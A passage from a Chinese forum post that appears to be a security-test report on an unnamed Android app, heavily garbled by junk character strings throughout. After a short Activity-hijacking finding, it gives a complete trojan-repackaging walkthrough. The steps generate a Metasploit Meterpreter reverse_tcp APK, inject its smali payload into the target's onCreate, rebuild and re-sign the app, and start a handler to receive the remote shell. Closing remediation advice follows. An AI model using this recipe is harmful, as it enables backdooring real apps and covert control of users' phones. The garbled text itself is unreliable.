) N1 w. w3 K$ y! A( \ 4 ^4 ~) M c8 ?. [0 q+ Y! n7 W' L4 J   ' j" R$ d$ w: w/ ] # h' l& t4 p0 L5 U0 y

5 E2 d5 S$ z# }8 [7 @ # Y' A: [0 [; d9 q; r# _

$ c2 Q, u: `6 H: {. l4 E # @9 U, d: t+ Q3 B 1-2 测试结果 4 d2 F0 ~+ n' }9 ^, r. f ) H6 t5 O e6 F% `( N$ c" `8 h

/ W& |; h. u' t, s5 g( {' q8 F q2 b : h) l+ G/ K/ @; A* O- c/ f2 p6 S$ T

, [" h. f( c0 R! u, P% o $ w5 L* M0 @; q7 V9 f   ( G% ]3 z' B7 L* A& T1 R" Q / V- u* S- T D( w& ]

% r: Y [& u+ P+ E" S/ i9 f/ r# w/ w0 s6 H* Q6 B. ^8 P$ |' W

9 b8 t% [2 p+ I2 C* I o2 | , `$ d2 T6 r. B: ]2 M: ~ 2 检测结果                    : T& s" {0 m X ; |' k9 ^2 c( x$ ?

4 L2 w K% O+ c% k* k& @1 a 6 L% r) O1 O8 }& y

) S8 |7 v) P$ P" \' [, ?. v& S : F6 F1 Z2 J) P6 i 2.1 某某某 7 L# ]- c; S2 E5 Q ; b. W( n: u0 i0 r

% L0 G6 A) Y* _+ z5 }, i6 m* x$ ^9 v- R; J' ~) N

8 B4 }2 @, i9 K I/ Y , I! I* b D. n' a6 P 2.1.1检测目标 , J1 E. V! e% t, c- H : H' i+ D1 V! ?& o! O- }" }/ d# E( O6 N

- t+ k) V% z* M+ u& d5 ] 1 {7 x9 i! F9 G3 l- y( X( w1 ?

5 K$ |6 D+ z8 ?& G- I; P6 k% e2 Q$ z7 b, ~% | 目标地址: 某某某某某某APP 3 D' r* m/ K' q0 B" A6 g7 ^ , ]4 [- J& X6 i0 Y7 O- p

, v1 {# i& l0 {* _3 h- b # i1 u/ Z r: c& B

3 e1 x1 x; z/ c) t( w , q% [1 e+ u# u% \+ R/ I 2.1.2检测结果 ( h L# |- p& F4 }% `$ g! T+ j + J) Q- A$ H% }1 c5 y

7 L( ]$ {, t5 }8 z; M3 X o; C0 B1 @5 l! x1 `5 l

: u) ]5 P$ Z9 i P0 s; k , e- _/ o9 p* l1 B# t 2.1.2.1 n3 J ?7 g& G 0 x" C+ c9 c) o+ e7 a0 l( `3 R

; G+ i% V; t$ \5 C* l/ |& r: C% U: b6 D: r

. ^8 e; g$ A! t/ r0 L, Z6 C ' Q0 _ g) G# r# z* _ 漏洞链接地址:某某某某某某APP 0 R% w2 |/ }2 i1 G + s, `9 S9 ` y Y& ^* Z

9 Z/ J( z2 P. t# D+ V/ Y( h2 M* N' h" k: [- c

( R7 C2 R1 |# h. j8 Z; P$ a4 h ( u2 `; z: T2 m   * K0 i% ` I4 H! C, @8 B8 a, ?% Z5 L8 ], v: J

B- x9 a: _5 d" L3 v& T; |( a7 m3 b! Q 3 i8 ?1 T( ]& N, m, R

, e" J3 j3 F1 ^) ~. w7 g; I. j( r8 A& i, F- E, z8 ~ 漏洞分析及取证: . |( [& @1 |' K5 T 0 |4 ~ \- a" W

5 e& N: p9 O1 F5 B ( X/ J: f; B, v1 q x" G* l

3 ^0 r* z2 Z& x6 c ' D+ a/ ?9 y4 |                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: & h* a7 h5 u8 m8 B2 e# R . b! A5 A' _; `1 L

6 r+ A( l0 a" B ' @; k9 f0 J o {$ q

! g/ `1 u" r) f7 ? + }9 R/ p& y8 L3 F# h. A7 P0 c      + @. W, d+ b* P1 L5 h# i x 4 N; X9 y. U% z5 Z) e$ P% B6 F" P5 z

, ^7 ^# I/ B5 r g7 n3 W) P6 {; {! _$ f8 a. J& C/ R+ P

# ?% `* E' m# Y) { # _3 a" Z$ q4 X1 Q3 I/ Z                       ) i3 e. {- x% W7 u. c# q 3 B5 o, N0 L, H8 D8 d1 l9 L

! A N# z& ^* ~6 _. W! s . E, G" S/ p4 ~ x2 ~6 Z1 s- C

# O+ z& A/ _/ q0 a5 k0 P 5 A8 ~+ o& K9 g. l 1 J* Y) {+ c) a4 \3 T ~% b/ c " ]; O; o& Y: G# ^9 i5 [

1 L) ]0 E0 p2 e5 v* i2 a: J, h3 b) W: P1 \/ l7 W$ O* W

4 v5 W7 V" _* k# r6 q, C8 b- p, k * ?( M. D; Z0 ?( Z 7 j9 |: Z. P5 D8 z U# V 1 p I2 ?7 Z0 F/ I

+ |0 J$ B1 U5 n& W7 b) x6 o/ u& i& Y2 B ' R r: B3 S' l% X

2 X. m$ F/ M& R6 n! Z3 S# T 2 N8 v5 M6 M+ k7 _+ d 5 b0 A; e( t8 u% w& Z ' s" u# v2 w) o7 R9 [; B( W" ?

, c: F0 `% b1 c0 \$ y & X) R2 O+ _: g& c: [$ _

4 R0 n& ]1 X( M/ D6 V2 o e2 c6 ^. l; I' G; |8 }" a5 X 漏洞危害:高 ; H7 h# w+ X' i * u2 }/ t1 w7 B) y, o$ u4 ]

, ~3 r( S; h8 L: q& l! C7 V$ Q- ~* V( V 3 N( B( J y8 X9 O* M6 Y( N
; J- @ Z/ _( B: W7 N" b4 |) y* T1 o% a. ]/ x* y: j% ? & D T+ ?5 K c1 ^" b# p6 W+ T! c4 J7 c( x9 ?# p2 ~9 Y3 {7 A; ]$ t2 c2 W1 T# j! d. [6 u* S t/ P) G& z( b! a+ q7 T3 b9 Q* c% |- Q9 M$ Q- o. ]! n5 _) U! B. E' c) A# N7 W+ X6 n A2 ^) A! I" M; K7 p1 C+ U+ J% i( T6 q$ b1 R) X% C/ |0 g1 Z7 }2 S) n; y! h0 l- p9 Y5 n/ U3 p. x4 c: y/ P( O0 {6 P6 n/ H$ M* ]0 y8 z- H0 e# r3 _" X9 V8 |# h; |5 ~9 h t8 `: ^$ A4 j. E- v3 v/ l6 Y5 S1 I" H) ]- W' [5 J5 u1 M: R7 G1 E1 q2 g' ~# E" @# t6 _) }7 c) d& x* f, @( t; I# ?) ?% z3 `, h* r- R }# A( ]# _1 c6 J" B# X" z* X- d% x6 ~- M# o' R, n/ v5 @0 R# U( D0 F6 k; x" y0 S. j C7 o5 ]' o0 }* S7 o }8 ]/ F4 l6 Z( [3 Z$ h; Q4 i* t* {( _" Z( U
_; z, m& E1 F+ j" ?$ R8 ~* x: Z+ }6 I+ c. _ l0 x. ~1 `

& l' n$ `8 c+ D1 ~1 f * R3 |, v7 F. H7 H D$ J 严重程度 1 D0 K7 r/ B; @4 ` ( d1 p/ M0 V$ N% n( x3 d

- a6 y+ M' Z$ y/ U5 u. O+ y' O7 W$ ]4 I1 f& o% J+ ~& h, K8 a$ J* _: K+ e 		2 G, G& g% |# \8 G' S( p2 E 1 {4 G8 I( T y1 n8 D

9 e! O A" L7 Z $ U7 g4 m+ G) k , B3 x! y9 ]# i7 Z. A6 J& M, ~1 d) R( K* A8 _- ^2 Q( O0 C# j

. s9 J& \3 l* c2 j9 S- @6 o- J7 M8 u9 i: D9 V5 c7 k0 G e 		: { m: X' e4 a4 p0 {. a/ q7 R# x( ?/ T, E7 X, N

5 s3 W. K; ?: b- B* s. E1 G5 x- L$ z- Y* E# U/ J+ S' v : @* d* l' s- b. [4 R ' \! ]$ n1 Y, y

& d4 B. c+ y% n- ]9 h9 I& ~& o8 D( M4 d* n) j0 D- X% {9 w 		C: z8 c( C+ q/ M K! Q 2 a5 Z& J ?8 S$ D

( Y% Y$ _1 \9 S0 Y6 I- N Q# I0 X! n8 X' s $ [) F! s ~& U+ {% r% n6 H* M1 Y/ a9 ^7 N5 L; ?2 q" h

8 K. n1 S) z3 d- |5 i3 D1 i6 E5 @- U* ]+ B6 G! ]. Y8 M U 		" t, m7 N7 R L7 V ' E: D1 o1 ]7 V7 U4 G

^, g3 q0 {+ S. D1 Z1 n. A2 b( g# M+ Y- ^! m$ K   0 |0 L b5 P: p$ J" J! o / S. _& ~% @5 B% R+ q

5 O' d5 `1 S+ ]. p H9 J3 p" Q* t& ] 8 f4 K4 b# L: i1 O- [/ l8 m7 `/ I+ D 		8 l$ A0 r3 I: p% e# A" l3 z' T% B }+ F/ ?: r

9 Q3 D! x4 V/ d6 D' r! y4 C( {$ x4 E- P# Q3 A! T- x0 b 5 v( o0 y0 P+ ?: Q( Y/ |4 A 8 n' u3 u$ q. T) l" H

* g; `7 U! Y+ c8 \1 v+ e4 S1 M1 k2 T7 o5 S0 `. A 		6 `; b [; b5 R/ E2 [9 b1 p 7 ~1 a( V- }' c% Q( h' L- A& \

8 [, H/ w8 i7 `; z! M2 w - c3 {2 ^* q0 s   % Z" h" j; @0 i/ R% {! D9 A- G; }% @) M# `0 ?, {

6 u {; {" b F4 v8 B( h/ {9 R1 l8 W1 p. Z2 \
7 X8 o/ L( y+ X+ {! Y 4 _9 o5 S! r6 y4 {- T1 g
4 q+ X' m9 {2 n! N, a 3 t' O" }) O8 C5 `2 k8 u" }

$ a$ y/ l! U6 l- E) a# b + T2 @2 p' X: O1 t( L   ; l5 p z# z- ?; | @) J3 x+ R; X6 a4 ~

; h7 Y! G( o1 t* ^$ F$ e0 D 2 C/ O7 i( a& G J% V! q

$ m V R; |) Y6 q/ a- ` 5 x; R* R1 a R4 v. d- p 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ' C9 p, Z# p$ J- ^0 z7 \ ; C4 `7 I: N& |: C) ?6 g% K

4 f2 L. [0 h6 d+ ~# f- h$ q7 o- Z( g" ^# U8 R/ q1 E

$ E# q7 [! [7 B3 i) R) n ! W. g. p @8 n+ s u ^. p           ( x2 ~& l/ z% w+ E ; V0 j: C9 a& v# O

* M: L; i9 Z. d# E- y$ d & W$ v6 S8 n5 M+ ?% m( G5 c

9 Q8 V3 c* w ]+ [0 T6 a . l, h' w3 ]; C, c   6 r) j/ u7 U! W8 q1 j* O1 h4 ]( ?1 `* z

0 @9 U' R3 K H: O6 b % d; {3 M d& X" J5 {0 e; l

# J, q# S, B) Z. D , G( i+ q& \8 @+ S 2.1.2.2 ! c2 R1 G! E. t3 {6 e& k / c8 D! I) o8 i3 ]( U- C

+ e2 I. X/ J6 }. m( |$ y$ \+ ]9 P2 C4 R: y3 G8 P! U( r

8 C9 l# l% [1 k( c6 ~! L8 F , N% S4 X* m9 ] 漏洞链接地址:某某某某某某APP 2 M0 _, r: y; o , _0 I" P4 J! G( N2 t) i7 ?

2 L) q7 s6 P4 }* N. a 7 V: ^& \! Y D% u: W) k3 j0 I" P

+ T9 w/ q4 z+ G& v , M" ]# j/ `' g# U+ r5 }- [, T6 y 漏洞分析及取证: $ L2 v. C1 R0 D+ j0 a% V! O7 z8 k {

! x0 t6 g8 @; _8 r& c8 _1 V ) H* \& Q, m/ }, U, O

# r6 l$ [& b5 k! J) x. B: j- p8 m ) H) A& Y$ b6 |' T                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 0 l0 a7 H- H5 F- M0 |; e* D 3 d; R5 ~* A& \/ Y4 L0 t1 y" X7 p

3 R. U& A/ I& K( Q5 s 7 u" J+ o& I+ K! a

# }# ^# L& w( j6 J% }% A; [, o' ^; I6 W$ `8 F' c# z Metasploit 生成木马 apk 2 x3 i- Z& n4 o / _, L9 V( d3 H4 J

& K3 j3 A+ ^& p/ d 8 h9 a8 r/ c1 W2 P* O5 {

9 ~! X& w, L( g! Y4 Z* Y. Y% B' I" h ) F' N: V/ J4 n! ?+ w msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 0 U1 ~! {/ R* X, W9 M4 b k7 L4 M $ Z; x+ q6 C$ w

# h* p( L, H, @; W 3 c2 ~$ Y" `% J O* G! o1 L8 d5 P

9 r9 H; s0 G0 \* x \( d9 K8 K+ Z , l' {# g) H, K, r( H3 b 反编译目标apk和木马apk " _2 S0 E: Q* F1 ]* w( x 8 n5 t' f' ]1 i* i

8 e/ o; `4 i$ q4 _) }8 G3 Y" ~' p* i4 h

4 C' F% ~0 c# c, X( H4 C) u O( q4 u% j5 {* k) K, x apktool d target.apk
/ Y ~: e# _4 p; b: a% B, P 8 a) c2 J; L1 M+ r2 e) y apktool d cockhorse.apk 1 @6 ] G5 u+ J2 c6 u+ G ) M/ ^! W+ ]! }9 ?# e

7 k9 |! k1 s! `2 M! J B3 B ) R0 |7 |& f" i/ {

: G' A0 J8 f0 t* P o8 Y% s8 w( K( Q 木马 apk 注入目标 apk : W- F) u7 s @4 @0 Y% Z& ` }7 F: v

! Q( l8 b; ^8 O8 f+ u' r6 w & o: {) C3 [8 j) c+ o: q; k

, q# a1 G* L& f+ b9 ] . ^8 X$ O# [2 ~! b, M 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
' B9 ^( j2 P& [: v$ U1 a/ } $ o6 O! b$ V+ f1 [$ U* V1 L/ _ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 9 V/ A4 ~6 k, z# k0 ~ g% ` # z0 _ l) N8 E0 H9 v6 s0 @

- D2 C. Y3 X8 z8 z7 y8 M- ? ) a" m) i2 c( V9 n% r. l

Y' f$ B) o e x5 s& q 8 o8 q9 f+ k" u2 n4 Y 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ' y9 r' z+ }/ ?6 G5 K: ^ 6 [+ G2 }6 y: Z0 H, Z% g) O

& n: P4 I3 i# c: b* I / j0 o! V% l) Y& p4 ^5 f

0 N* P1 d" Z& ?2 w8 q6 p- _' D, f9 d( U$ t: k 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 9 H# ^3 b* D: W/ V- [* @ + i/ Q$ i5 t H0 f4 b

2 ^+ N% i8 Y& i8 ~2 i3 y6 o9 F y3 M: ?2 E4 }- Z' L' V

1 \" S$ ]! c& P+ }" y f2 V ' T6 F) `: f: Y1 `6 J( g2 F8 e) E4 s 回编译生成最终 apk ! x; q0 C! }/ d. U+ D 8 p4 l+ D( I) U1 K

# Z5 `/ E3 w4 H9 Q& I- E- l6 S$ r" f2 _

) ~$ n; P' U1 c5 ^/ h& Y6 G 2 T. k2 w' n( h3 l% G# N$ ~ 重新打包 3 q1 L4 c* z/ Y: ~$ ^9 Y# [$ W( z5 ]5 X& |. q7 ~" {; p; l

! m: b/ C% E1 Q% u0 I# I6 l! m9 w | 3 d9 y5 M' C. b P

6 d3 E J$ Y( m: I. U; X 5 [$ j9 ?5 p: K2 @" r apktool b -o repackage.apk target_app_floder 6 P5 ~2 E$ [ }% A- z b3 N! X! W k( n5 \- Q

& o4 d+ V- \/ `+ }& F0 z7 W7 A) t1 f; b$ u( {& L. O: a! N" a+ D

% ]; Y7 l: M; ` 6 I- |2 @8 v z 创建签名文件,有的话可忽略此步骤 " d. S( f/ z; w0 N$ z6 s - r+ p5 n2 C. f. c6 A

w! {- x/ Y; L 7 _8 `* m8 E* ~( d1 f4 `" d

: z( Z+ q0 L3 |" y 3 x* r0 J$ x4 S8 h( B! F keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                ( N) t; M1 s8 W! z8 Q1 A ; v7 v% [& Y; h% r

0 b! ^; C6 p" ?; i& i" d, U& v3 A " |+ s3 S( X& Y N& i$ r

; M3 p9 T/ i; J, H/ W 1 N: v5 u# M1 i- b8 } 签名,以下任选其一 + u# j3 p- K+ z. V # m9 V3 K. F0 E

/ j. b) l2 C. ]& x- A7 V/ ^# O6 h. L- n. h

2 a7 _6 \1 s3 A) V8 T ( y$ T( J7 C- t5 s3 a/ z) I9 Q4 N+ T7 l jarsigner 方式 3 D0 C, R+ R' t , ^* X1 ]8 Q2 I) G( g3 A

9 F6 h. Z/ V2 S6 H; o$ y 5 f0 ]- h: o: I$ q

! P! q/ W. y" E( E; P. O2 ^1 a. M, O7 u$ `* x/ P jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname / Y& m. t; \# \2 d, t" l" F' B# |" Z9 c( o; a# h" Q2 `8 F

0 e/ s1 R, m4 M S8 b - o+ E/ M' g* E/ ?4 k/ a4 ?

0 a* H$ u3 B: j# h 9 x) k. z4 r) ~4 W* ?* F apksigner 方式 2 C* s) P" Z8 \ f: U* E p , U _! \6 M; _/ m) a

. {5 m0 h: Z8 ^5 k9 Y , T k! T: b! W" g3 t

9 ]3 l& c( \$ U @8 W% ^ 3 U" v: l. L" q. k& C1 P apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk , ~/ J0 T4 P# c/ \$ t - m6 w a5 N+ a# K+ ~

3 I; X0 x2 f- J ^- L/ S8 g: \& t 5 u/ T! N1 x4 J0 S; m$ p

3 ]- c$ X" U% S$ U0 v* w6 e5 H5 b4 o6 s. F1 l6 N" n( O6 R 如需要禁用 v2签名 添加选项--v2-signing-enabled false ) F: r# m: C$ G0 f2 w K6 D 5 B1 J' G5 e3 l' ?

$ Q" h- Q6 i7 J$ A; z2 n ; I2 m; L9 |4 Q* p0 s

1 _0 h9 q+ }$ T. n w " p& i7 C' }+ u' P3 `$ O. H 验证,以下任选其一 - L" z0 j0 w8 c : z# r( s6 Z& i+ |) |0 g) c

& t/ k: S* l' g7 P ( c: A0 q; G, F+ J! S/ i

3 o3 x8 o( P$ N& f! x G$ D / z" w4 e v2 ?$ D jarsigner方式 + E* U5 Z* F! Q7 R" K ; e* Z! C" N; W. t* v8 k' Y( A

( E7 k( y' J0 ^( X # M( ?1 Q* Q9 Z f: i- y+ [

# n4 j+ k& @$ Y / e0 [/ j# G3 g jarsigner -verify repackaged.apk 1 F8 I8 o1 `* f0 w$ s! O; C8 B6 a / v0 t& {% c2 ^4 ?

2 O4 v* ~ }1 m- Q+ o& d( R8 ~/ L0 v7 ^

& P$ _" r: o0 P$ G$ I& @' T3 c % \5 m* }% K+ [! Z( A0 f apksigner 方式 7 L: a7 q% s% a8 | : ^7 Y& o9 E, S3 C) J

) ]% j2 h; h1 D ( w. @; X3 G9 T9 O9 M

; Y8 `1 D& S! x& K* i: x* \ N+ D, c$ G- J7 ] apksigner verify -v --print-certs repackaged.apk 3 z* y# H% {# } ' _4 a- ]/ @! J6 {$ r$ D

$ B: a2 |' f7 m% n2 r0 e5 R4 L6 T7 s

$ W# M1 ^' \4 i 4 R& g+ R {0 J keytool方式 " U6 z; }- Y9 G+ _$ X ! _" T3 O O+ x: S# K$ t$ J" A# U

) j% }) w' Y( v4 b2 r1 s1 S ( j- A$ k6 a6 S( R$ o" q r5 `

. [- G2 j0 c$ d, u5 e6 m/ T% z, `3 D% D% x& m( d" I& l6 B9 V keytool -printcert -jarfile repackaged.apk ! F! s' `% _3 l- P + R I/ ^- M8 O i! y

* q2 S( Q, z- e6 v# z& ? B q$ c* n \ o/ g

. l+ m" t( N2 ` 1 f: f( I8 V0 Y. f0 g+ U 对齐 " ]! M8 {6 `' s+ x ; ]- @& q& I5 X0 H! v" M' t

6 v, T9 ]& Y) F$ t * E7 v9 X- u( u3 V2 m- h3 ~7 b) i

# p, U. e1 p9 D: f I2 }* H ( X4 v9 j; V/ w. j 字节对齐优化 " a& ]# j" ^& M3 Y2 o 7 I4 e! W+ w! H N0 x

# U# a! @$ s( q9 d3 d, ]( W ( r/ s: v1 Y4 C5 d* `' j$ H

% j) q6 x7 j: h; }, y4 ?& p# i% r j 5 d9 z! P; X6 E zipalign -v 4 repackaged.apk final.apk 6 i! o0 U: U! T7 R% E" D) ~$ h , o1 t# O* `; M) r* Z3 D3 o6 N3 @

$ z! N$ y% @2 _* ^' a$ T 5 f3 H2 W+ C6 Y7 U8 t5 p

$ d3 h3 I( ^7 n( G9 @! S" e1 {. t5 z3 B( W 检查是否对齐 ( [- A2 ?6 W3 o4 f2 C: F* D) {! L6 ^# z$ d% t

5 t4 F; p7 y, p c2 E1 e) j8 | 3 K- {6 ?2 N0 }4 b. K1 C

+ @1 ~. F( I$ ^: h) b 6 L5 s7 ^! C' \ ^7 R1 a zipalign -c -v 4 final.apk * a9 j* m; p, d& C9 w' b ' o6 @6 ?+ _) y# R

! w$ w+ k; P* s& f 4 y1 [* T1 d* X( b# ]4 a: _

" _* u0 G9 u7 A, M4 Z% }. j- F3 A 5 v( C1 h, K% ^2 N% M# V 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 4 {& m5 s: u* Y6 X" Y6 E ( k$ M4 V y' x$ W! w, y- H' N

# z$ V3 q, U5 m. w # }% D- R$ `2 q. @3 f$ D, } l

$ C/ u- U/ x K4 ^ R$ z. Z - p O6 [$ [7 C 启动Metasploit控制台,配置参数等待上线 0 s ]& ^8 `( N! I) N: W1 f ' _) l% {& h' N/ N x# F4 T, @

- ~# \+ l9 _6 {; g- l 8 k( E' z! j& ~5 D

A$ q3 F, A& t+ h* r' ~9 n* r* I; e7 S8 Z. K* F7 a% r 在终端依次输入如下命令 4 D' G. a. ]7 X( D% J' y+ g ! T3 k5 I9 b" L8 r# \7 f7 X# t3 `

5 M: _4 j0 U/ u C. G + Z/ r! t- [$ B! n: x

G+ ]- U* z2 }/ t& l8 s2 {+ Y/ K- y8 D/ ?7 C msfconsole , H4 E2 k Z2 b& B" M8 q 6 v# b! T+ U9 D- [- i0 g

# C6 y. n2 L4 ]5 D+ [ 9 S5 \, V" V/ a

; e1 z' J; E+ p$ {2 Y1 A/ @4 _2 t3 O+ T' O" H7 ~( N use exploit/multi/handler 3 B4 b8 ^+ L% v- y- n- x" D F8 a& d1 Y% l

8 N5 X: E. M& _* B `% I; r( U2 X6 m

/ L3 Z5 F6 H" |; f! C8 G 7 i7 A' [' S! W& ]! C* @; X0 | set PAYLOAD android/meterpreter/reverse_tcp : [- z6 P4 K, h, f# `1 g0 ~ 0 K* t: y8 ~" m0 ~

3 y/ O6 G7 o: y1 K" { , A. l- {; J" R# I$ v2 A& Q2 z. Y

: q' k4 ^9 v9 X6 Z* v, P 7 Q+ O; B6 y) s8 B" ` set LHOST 192.xxx.xx.xx - Z( j& [3 k/ R: m) J" S % N& z4 h0 F# h$ v6 d' i) ?* I' {

. T' v. q# L( x& y7 @ 5 v @& v" C3 j! h+ l

2 T1 r+ J* B% _8 z * ~' j6 A3 d n8 U$ C+ M set LPORT 4444 & g' p4 v0 O) r ) @: Z a7 x! E% l; V

" A |. C+ j+ K+ R4 D. a" ?2 d8 S7 R ( L& ?* F* z C4 k0 r, y! W7 D0 i

" n- z5 d5 y$ k8 { , M# p6 W( G: r; ?1 y7 O) n- q% l exploit + N' \: F5 x& J- P2 R7 z 6 {5 O) |9 ~$ M' |4 Y3 F9 w

# v* ?& B5 i- ]2 B5 ~ ; J4 M L5 e" G4 q# z7 ?

4 A r6 d( _0 B/ q/ V' C/ i$ A 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               $ E- @. l8 |# P# @4 j7 b) ~ 5 ]0 P" @% t7 R- Y( j5 F& D- U, y' u

# F! i" J6 I. G# B9 C ' n9 N3 b# b0 Y8 H: C+ ?& U

$ E$ {* r$ H3 M [) G+ l) S: I 4 `8 X- J$ i/ |1 L# Z 漏洞危害:中 2 i( o. F0 N! G2 ~; l " Q1 n, `% @# ~

; \- w" D, v. k2 ~) A* v% F1 ?0 G+ J 2 c U. s3 W+ a. W
9 g* n* X+ x. m' M + p; k& ~% s0 f% F6 o - a+ Z# _) T! [. G2 |0 D . v9 v+ C# r* K6 |4 I. H ) y% t: ^1 X9 r2 v+ _: u1 D8 ^9 l6 ]4 d9 t1 P, ~9 A' s9 o+ C5 ]& v* f+ ~# K1 O' l$ m* ~ \. Y' K2 A9 G/ I- v: ]9 u0 v1 b! m t6 B, |4 g+ \! v v8 s! W4 ~6 |2 W3 ~& O. b$ I% C' l, J# ^) a* N9 e# P2 G- C: s5 k8 S( _" f- l: g; e' N3 f. I# p- g' O/ f. R4 I& w1 T4 T/ L$ h& W8 {; T* t* ]; D5 A# }8 K6 H; v* F8 l: r8 {! l; s3 B5 o" Q7 _6 q$ o# S! d) x* {: c8 U* x4 h, i T. E. h' ]- [ P; Q+ g- K$ u7 Q) \& `3 f/ v- t- B! M7 G& T% i1 U" h" h2 h2 ?' _9 L- B* W2 a3 _( }" r% `9 U1 z' L2 V) q3 |: j; m+ t! [2 y6 h! K! Q. t& x! E3 W; R/ P* A: u x+ ?* M& e$ ~7 m& A4 b; p8 |% ?, f/ _9 ~/ C( }7 W; f H B' ]) [+ {9 j6 F" k
2 h1 y9 A4 u7 T; }" U7 K 5 {0 ^! ~; N; C2 J

8 n m* l0 I4 f/ ]4 |# U0 g5 t+ ~ & b7 d% X+ f4 W" r3 t 严重程度 ( Y2 i: c! J4 v+ b # ~$ \0 f" M5 X- d, \

- l! X. r P* o6 H4 v 2 X+ M; p2 x; v8 D5 U5 w 		% Y: n* X1 }" Q8 r" |" j2 Z" P* {, d& j2 g% j. T! ^

' m7 [$ G2 c4 y0 o7 r* |, B , v+ z% i7 \+ u 3 D2 J5 {3 \1 G0 P& W" } ( ^5 i* H; D. b8 a: M4 F4 |

0 \) n& W' w9 W" i. ?+ R3 w) d) C+ ^+ L9 x) e 		8 R, v1 {; {* w2 J- b) l- b ^ # _9 W+ K0 Q2 b! P& z* }

0 i3 {) M& g `/ X8 t r. F- T $ w' m( ?, S( u B, T+ b+ T 9 ]% `5 P4 t( G3 A% k p. ]) ~ E9 N% U- F/ l: [4 m

- o0 y' M: D1 ]2 k/ [, i6 { 0 S. [) k8 a' \1 G 		8 c) M6 K2 y) z' H2 F5 E$ j% g+ j6 O# B+ z

, W' M( Q- \/ N" ]* x) K* | 3 B3 o8 j" t! h$ c2 l4 }: E ; {* b @- r e/ y! _! h3 T 8 ~8 X1 |2 P1 J$ L

Q0 J# Q' O& ~" f; {7 E/ X . ~$ J1 w( y" }7 X# x 		7 h2 v- X( E2 w# F' x. D ! O# s# |& V' b. {7 o 8 J" {( B) N/ u3 h) z * C7 B# O4 ^0 \( q6 w3 G. n

* q9 E4 @6 R/ U& _ X& Y + Y9 W! N* N; z/ ]   z: l# z% Q2 W- r8 W2 n % e8 b, a7 k$ m+ n. G

3 G2 e- T5 L4 N5 u& x3 l8 x$ ] " {. |* o9 |. F4 c6 E( E 		0 r2 Z& r/ |/ | ) L7 Q- m9 r) a& M+ U9 f$ n

; r( j" C5 T& r h T$ K' n% k8 L6 U# C 0 e$ A* ~- X( _, G9 E' a* U$ G, k1 U, o9 H% `( j. c8 p( q

* B4 _. m9 w1 c5 \: N& w+ {6 R; Q7 [: w& N( H 		, ]2 O1 F8 _5 |7 E& r! w & ~/ F4 X% e$ b& H q % c2 w+ g6 S5 s" w k | ! b8 w; E: H [! E( |& ^

: T5 ]& X- e7 y, a+ W k; J. p! r f% g. p) w, w7 ~& S   $ ] ^6 ]5 e: S $ d9 u, X& x* x% L2 [: }1 |

0 \: s/ H* n, ^5 D( f, s9 M' q" I0 A( E) H8 p- J ?/ S
: o* D" N: G4 _6 a/ U2 j6 \) |8 w 0 G: ?$ w1 n- M) {7 L$ N
, M+ v2 F" f3 w # C8 W2 b5 S1 x* a# K& A

0 L/ y3 }. a0 _5 Z3 I# C: T! [ 6 k- V' n0 u: M! I9 M C   ' Q. \6 ^0 _& B* v3 ^+ e) M6 z ' I2 A7 r2 D% ^. s! Z& g! c3 K

5 m( ?% m( z3 N/ T0 I O/ y* j8 B1 w l! B) m6 q

5 N. E9 X J3 v$ k' v& H( z+ }9 K0 J! Z8 j% ~ 修复方法: : d% A# Q/ U/ o, i3 C* W% h; {( [) P

4 E- \ f5 ?4 I' N ' b, \$ T: R+ z

- Z. @, M& L& ?$ w . J7 y) V6 r" t* j/ |               1. APP 启动时应做签名校验防止二次打包。
& G2 g! I q( C! v8 Q4 j 2 O* D' @5 Q$ x/ k 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 / S, }1 J7 v8 m- K; k4 H+ L 5 }! F- J: o: }8 O6 g |: v

/ L# S) e7 U6 P" s% w( w+ U b' X' e3 d% [+ {7 @9 n $ Y( G2 C4 l0 o- B/ _: z: i6 |. i% t6 z/ K7 x

! P! t8 B9 t' W% b 0 L4 ?; t% n1 U2 ] x   ! ~: z4 W/ M- K0 A! g% y$ W: B& J6 i% h* c. C( V( ~; K/ K- _! r

$ L/ E/ @1 y1 J4 k9 j: [ + O0 j6 A$ B* g% T0 {/ J9 R a; `2 X% Q8 G$ z & q4 Q9 F# t3 T' m; d( E8 C

: s4 x" n5 S* g ; I N+ r% k5 r
$ K9 |7 k. R5 m* H J5 S$ @! J) ?1 q" S0 q

2 F7 ^$ [: ]3 ?$ W% s/ m. e . g) i: _. k. y5 l
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表